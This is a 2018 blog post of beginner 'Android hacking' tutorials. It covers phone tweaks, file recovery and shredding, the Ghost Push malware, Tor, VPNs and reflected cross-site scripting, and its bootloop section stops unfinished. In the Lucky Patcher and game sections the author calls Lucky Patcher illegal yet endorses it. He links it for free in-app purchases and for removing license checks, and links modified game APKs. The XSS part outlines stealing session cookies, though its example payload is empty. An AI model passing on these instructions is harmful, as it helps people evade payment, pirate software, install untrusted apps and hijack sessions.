Friday, March 2, 2018

Tweaking Android - Boost
Image associée

“When you modify a certain piece of hardware for better performance, it is often referred to as "tweaking" it. Overclocking the computer's CPU or changing jumper settings on the motherboard are common examples of hardware tweaking. Removing system limitations and adding plug-ins or extensions to a computer's operating system are types of software tweaking.”

Before learning hacking, let’s make sure that your device is responsive and free from lags. To do this, you need to tweak your device. This tutorial is for non-Rooted devices. First things first, let’s ask: what causes android to lag? “Your Android phone was probably fast when you first bought it, right? Then over time it began running more slowly. This is a common problem and nothing to worry about.” -Scott Adam Gordon (www.androidpit.com). There are common reasons why your device is lag such as: It can be cause by an App, Too many applications running on background, and/or the system itself.

HOW TO FIX

Method 1: Uninstalling, Stopping, and/or Freezing Applications 

  •  You need to sacrifice your apps to gain speedy performance for your device. If you have Facebook app or Facebook messenger installed, you need to say goodbye to them (Unless if you’re not ready to move on...). 
  •  If you don’t want to uninstall applications, you might consider stopping these applications from running on background. To do this, go to settings>Apps> then choose any app then tap “Force stop”. 
  •  Freezing applications/Disabling can be useful if you think that you’re not using a system app often. Go to settings>apps>System Apps> then select any apps then tap on Disable. NOTE: Some System Apps cannot be disabled because if they do, you might end up bricking your device. These methods are completely safe to do.  
Disabling animations could help your device run faster. To do this, you need to enable Developer Option. On Android 4.2 and higher, you must enable this screen as follows:

  •  Open the Settings app.
  •  (Only on Android 8.0 or higher) Select System.
  •  Scroll to the bottom and select about phone.
  •  Scroll to the bottom and tap Build number 7 times.
  •  Return to the previous screen to find Developer options near the bottom.
Note: If your device is lower than version than 4.2, search online on how to enable Developer Option.

Method 3: Install these apps to boost device performance. 
  •  Clean Master LITE – Helps you stop all the apps processes plus cleans useless files, claimed to be the best booster on play store. See for yourself. (https://play.google.com/store/apps/details?id=com.cmcm.lite) 
  •  Greenify – Works on Rooted and non-Rooted device. Force Stops all applications in one tap! I suggest you to pay for the pro version, it hibernates all the apps including system apps. (https://play.google.com/store/apps/details?id=com.oasisfeng.greenify)
There you go! Your device should be faster now! If you still don’t feel any difference, don’t worry this is not hacking yet. Later, we’ll going to hack your device’s system.


Recover or Shred deleted files
Image associée

Deleted Files can still be recovered. As hackers, we might have saved important/ confidential files on an android device and anyone can recover this – It is death to our part. Therefore, we might need to shred this data.

How to recover deleted files? 

First, we must know how to recover deleted files. There are numbers of file recovery apps but I use “GT File Recovery.” It is so user friendly that I don’t even need to explain to you how to use it! It only requires Root access and that’s it!  

How to shred deleted files? 

Shredding files means deleting a file forever. For this tutorial, we will use Fshred. Download the app on Play Store and open the app. you will be asked on which storage space you wanted to wipe/shred. The Fshred creates a huge file to fill up your selected storage’s free space; if this happens, all deleted files will be impossible to be recovered. NOTE: Fshred does not harm anything on your device; it does not delete any existing files. Just make sure that your device is on its full energy before you start shredding.

Alternative Recovery apps

Source: Google Play Store
1. Disk Digger (Photo Recovery)
2. Photo Recovery
3. Deleted Photo Recovery
4. Dumpster (Photo & Video Recovery)
5. Memory card Recovery
6. GT Recovery
7. The Recovery app
8. Undeleter (This one is the most effective but the recovery features are paid)
9. GT Sms Recovery (Recover Text messages)

Fixing bootloop (soft brick) 


What is bootloop?

 It is when your Android device is stuck on device’s boot a.k.a stuck at Logo problem. This often happens when you tampered something on your device’s system files. On some cases, there are unrooted Android devices that experience bootloop because of factory defect; but normally, bootloop happens only on rooted devices. Some people call this problem as soft brick, because the device is not totally bricked at all, it is half dead though…

What is the cause of Bootloop?

 “Boot Loop Causes. The core problem found in a boot loop is a miscommunication that prevents the Android operating system from completing its launch. These can be caused by corrupt app files, faulty installs, viruses, malware and broken system files.”

How to fix? 


Warning: This tutorial may not be compatible with all Android devices. 
For this tutorial, we are going to use SP flash Tool. SP Flash tool is an application you could find very useful in fixing extreme cases of a bricked MTK Android (e.g Tecno, Gionee, Infinix, Opsson, Innjoo etc) like the phone not coming on at all or not booting into recovery mode etc.

Requirements

 Your Android Smartphone should have at-least 40-50 percent of battery to perform the Flashing Process.
Android Malwares – Ghost push
Résultat de recherche d'images pour "Android Malwares"

Malwares are softwares or applications which you do not want to be installed. Malwares bring viruses to your device and also a threat to your security.

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed. The malware hogs all the system resources, making the phone unresponsive and draining the battery. Advertisements continually appear either as full or partial screen ads or in the status bar. Unwanted apps and malicious software are automatically downloaded and installed when connected to the internet. The malware is hard to detect.

It was discovered in September 18, 2015 by Cheetah Mobile's CM Security Research Lab. 

Further investigation of Ghost Push revealed more recent variants, which, unlike older ones, employ the following routines that make them harder to remove and detect: 

  •  encrypt its APK and shell code,
  •  run a malicious DEX file without notification,
  •  add a “guard code” to monitor its own processes,
  •  rename .APK (Android application package) files used to install the malicious apps,
  •  And launch the new activity as the payload.
.Source: https://en.wikipedia.org/wiki/Ghost_Push

I am a victim of this malware too and it took me a week before I discovered the tool to remove this malware.

How is this part of hacking? 

This Malware is created by hackers to steal your personal information on your device. Protecting yourself from these hackers is an important thing to learn. 

Let’s get started! 

If you think that you are infected, Download and install “Stubborn Trojan Killer” by Cheetah Mobile on Google Play store. Run the app, then let it decide if you are infected or not and how to fix it. If Stubborn Trojan Killer prompts or asks for root permission, please grant it.
Unlimited Game Resources and The Lucky Patcher

Résultat de recherche d'images pour "Unlimited Game Resources and The Lucky Patcher"

 Unlimited Game Resources 

Are you an Android Gamer? Have you ever thought of hacking your game’s resources? Do you want unlimited Gold, Gems, health, etc.? Well, for this tutorial, you’ll need to install “Game Guardian” app. Unfortunately, Game Guardian is not available on Google play store, this means, you will have to download online and install the apk file of this app.

Where to download GameGuardian

1. Open your fastest browser (Be sure to be connected to a Wi-Fi for faster download)
2. Go to https://gameguardian.net/download
3. Download the Game Guardian app then install.

How to use Game Guardian? 

NOTE: Game Guardian can only hack offline games. The best way to learn this hack is watching how it is done. YouTube link: https://www.youtube.com/watch?v=lbk9FDdIsAU 
Some Android Games are hard to hack, if you are on that case, you might consider downloading modified version of your Game at https://www.apklover.net

The Lucky Patcher 


Almost every Root user knows the power of lucky patcher. Lucky Patcher is an app that was developed by Chelpus. This app allows the user to block ads, Uninstall system applications, Install app as System app, Modify applications, and the best of all: paying in-app-purchases for free. Lucky Patcher was banned from play store because of course; it is a threat to Google’s business.

WARNING: Lucky Patcher is illegal. That’s why I like it!
Download and Install Lucky Patcher at https://lucky-patcher.en.uptodown.com/android
Then, you’re on your own.

  • The first and foremost features of Lucky Patcher are its proficiency to remove and delete all the advertisements from the Android apps.
  • This tool also allows you to modify apps permission.
  • It also allows you to remove license verification from the specified apps which mean downloading apps from other sites instead of Google Play Store will lead to license verification failed.
  • With the help of this tool, you can remove all the pre-installed apps on your Android devices.
  • You can have rooted and un-rooted devices to make use of all the features. You can get all the list of your installed apps once you install and use Lucky Patcher.
  • It is very easy to use, and on a single screen, you can control all your apps that are available on your device.
The Deep Web – TOR Network
Résultat de recherche d'images pour "The Deep Web"

“Tor is free software for enabling anonymous communication. The name is derived from an acronym for the original software project name "The Onion Router". Tor directs Internet traffic through a free, worldwide, volunteer overlay network consisting of more than seven thousand relays to conceal a user's location and usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity to the user: this includes "visits to Web sites, online posts, instant messages, and other communication forms". The intent for Tor's use is to protect the personal privacy of its users, as well as their freedom and ability to conduct confidential communication by keeping their Internet activities from being monitored.”

Why Should I use TOR? 

Okay, there are some tutorials that I’m not including here because it’s too seriously illegal in nature. If you connect to a TOR network and access the Deep Web, You’ll learn more not just about android hacking but hacking itself.

Wait, what is Deep web anyway? 

The deep web is the part of the World Wide Web that is not indexed by traditional search engines. Deep Web is only reachable through TOR, This means, you cannot access the deep web with your regular internet connection.

How to connect to TOR and access Deep Web?

1. Install “Orbot” and “Orfox” on Play Store.
2. Open Orbot then Tap on connect.
3. You can now enjoy Deep Web Content using Orfox Browser.

Note: It is possible to configure TOR to use Root access to enable you to access Deep Web using any browser.
Virtual Private Network (VPN)
Résultat de recherche d'images pour "Virtual Private Network"

FAIR WARNING: Virtual Private Networks or VPNs might be illegal on your country. On some countries like as Turkey, China, and Iran are blocking Facebook, Twitter, and YouTube and if you are in any of this countries, you may not be able to access your favorite sites. The only way to unblock them is by using VPN. For this Tutorial I recommend using Easy VPN.

NOTE: Some VPN apps gives free Internet access but not for this tutorial. 

Easy VPN installed!

Open Easy VPN and choose the country of your choice or press connect right away. The VPN will fake your device location. You can now enjoy your favorite apps and sites.

What is VPN and how does it work?
 Here’s the complete explanation: 
Source: https://gizmodo.com/5990192/vpns-what-they-do-how-they-work-and-whyyoure-dumb-for-not-using-one

For as ubiquitous as connectivity has become and how reliant we've grown on it, the Internet is still a digital jungle where hackers easily steal sensitive information from the ill-equipped and where the iron-fisted tactics of totalitarian regimes bent on controlling what their subjects can access are common. So instead of mucking around in public networks, just avoid them. Use a VPN instead. Between Wi-Fi spoofing, Honeypot attacks, and Fire sheep, public networks really are cesspools. But if you're working remotely and need to access sensitive data on your company's private servers, doing so from an unsecured public network like a coffee shop Wi-Fi hotspot could put that data, your company's business, and your job at stake.

VPNs, or Virtual Private Networks, allow users to securely access a private network and share data remotely through public networks. Much like a firewall protects your data on your computer, VPNs protect it online. And while a VPN is technically a WAN (Wide Area Network), the front end retains the same functionality, security, and appearance as it would on the private network. 

For this reason, VPNs are hugely popular with corporations as a means of securing sensitive data when connecting remote data centers. These networks are also becoming increasingly common among individual users—and not just torrenters. Because VPNs use a combination of dedicated connections and encryption protocols to generate virtual P2P connections, even if snoopers did manage to siphon off some of the transmitted data, they'd be unable to access it on account of the encryption. What's more, VPNs allow individuals to spoof their physical location—the user's actual IP address is replaced by VPN provider—allowing them to bypass content filters. So, you may live in Tehran but appear to live in Texas, enabling you to slip past the government filters and commit the treasonous act of watching a YouTube video. The horror

Establishing one of these secure connections—say you want to log into your private corporate network remotely—is surprisingly easy. The user first connects to the public internet through an ISP, and then initiates a VPN connection with the company VPN server using client software. And that's it! The client software on the server establishes the secure connection, grants the remote user access to the internal network and— Bing, bang, boom—you're up to your elbows in TPS reports. The horror.

Many security protocols have been developed as VPNs, each offering differing levels of security and features. Among the more common are:

  •  IP security (IPsec): IPsec is often used to secure Internet communications and can operate in two modes. Transport mode only encrypts the data packet message itself while Tunneling mode encrypts the entire data packet. This protocol can also be used in tandem with other protocols to increase their combined level of security.
  •  Layer 2 Tunneling Protocol (L2TP)/IPsec: The L2TP and IPsec protocols combine their best individual features to create a highly secure VPN client. Since L2TP isn't capable of encryption, it instead generates the tunnel while the IPsec protocol handles encryption, channel security, and data integrity checks to ensure all of the packets have arrived and that the channel has not been compromised. 
  •  Secure Sockets Layer (SSL) and Transport Layer Security (TLS): SSL and TLS are used extensively in the security of online retailers and service providers. These protocols operate using a handshake method. As IBM explains, "A HTTPbased SSL connection is always initiated by the client using a URL starting with https:// instead of with http://. At the beginning of an SSL session, an SSL handshake is performed. This handshake produces the cryptographic parameters of the session." These parameters, typically digital certificates, are the means by which the two systems exchange encryption keys, authenticate the session, and create the secure connection. 
  •  Point-to-Point Tunneling Protocol (PPTP): PPTP is a ubiquitous VPN protocol used since the mid-1990s and can be installed on a huge variety of operating systems has been around since the days of Windows 95. But, like L2TP, PPTP doesn't do encryption; it simply tunnels and encapsulates the data packet. Instead, a secondary protocol such as GRE or TCP has to be used as well to handle the encryption. And while the level of security PPTP provides has been eclipsed by new methods, the protocol remains a strong one, albeit not the most secure.
  • Secure Shell (SSH): SSH creates both the VPN tunnel and the encryption that protects it. This allows users to transfer information unsecured data by routing the traffic from remote fileservers through an encrypted channel. The data itself isn't encrypted but the channel it’s moving through is. SSH connections are created by the SSH client, which forwards traffic from a local port one on the remote server. All data between the two ends of the tunnel flow through these specified ports.
 These SSH tunnels are the primary means of subverting the government content filters described earlier. For example, if the filter prohibits access to TCP port 80, which handles HTTP, all user access to the Internet is cut off. However, by using SSH, the user can forward traffic from port 80 to another on the local machine which will still connect to the remote server's port 80. So as long as the remote server allows outgoing connections, the bypass will work. SSH also allows protocols that would otherwise be blocked by the firewall, say those for torrenting, to get past the wall by "wrapping" themselves in the skin of a protocol that the firewall does allow.


To actually create the VPN tunnel, the local machine needs to be running a VPN client. Open VPN is a popular—and free—multi-platform application, as is LogMeIn Hamachi. Windows users also have the option of using the native OS VPN client.

So whether you're a cubicle monkey, file pirate, or just don't want The Man getting all grabby with your personal data, virtual private networks are the best means of securing traffic short of copying it to a flash drive and driving there yourself.


 Web application Cross Site Scripting (XSS)
Résultat de recherche d'images pour "Web application"

even though cross site scripting is more considered as a client or user based attack we did separate it in a dedicated part due to its importance and varieties of exploitation scenarios as we can differentiate three main categories of CSS attacks: 

  •  Echo or reflected attack: in this category the attack depends on the existence of page men to be a convenience but it become a vulnerability due to full or partial reflection of the entered information as is. 
  • Stored Script attack: this category covers the attacks based on the attacker being able to store contents on the server side without being sanitized that will be available to other users. 
  •  Data Object Model attack: The attacker in this category depends on the updating the Data Object Model of the document to cause change on the page not on the reflection of information through the server. 

  Echo or reflection based XSS


Attack requirement:

A. The user access a page that contains a vulnerable page with echo
B. No sanitization is applied on the reflected input passed to that page

Attack process:

A. The attacker creates a link to the trusted site containing the vulnerable echo page passing the JavaScript as parameter.
B. The server will send the response containing the inserted script.
C. The client executes the JavaScript and containing any special message or forwarding request to phished site or simply send back session information which will help the attacker in initiating a session hijacking. 

Example:
A. The attacker creates an email containing a link as follow: 

<a href=”http://theTrustedVulnerableSite.com /echoPage.php?message=” >Visit page

B. The echo page will generate the page containing the script, the script will be executed and show the alert.in real life example the payload script can be s script that sends session cookie information automatically to attacker.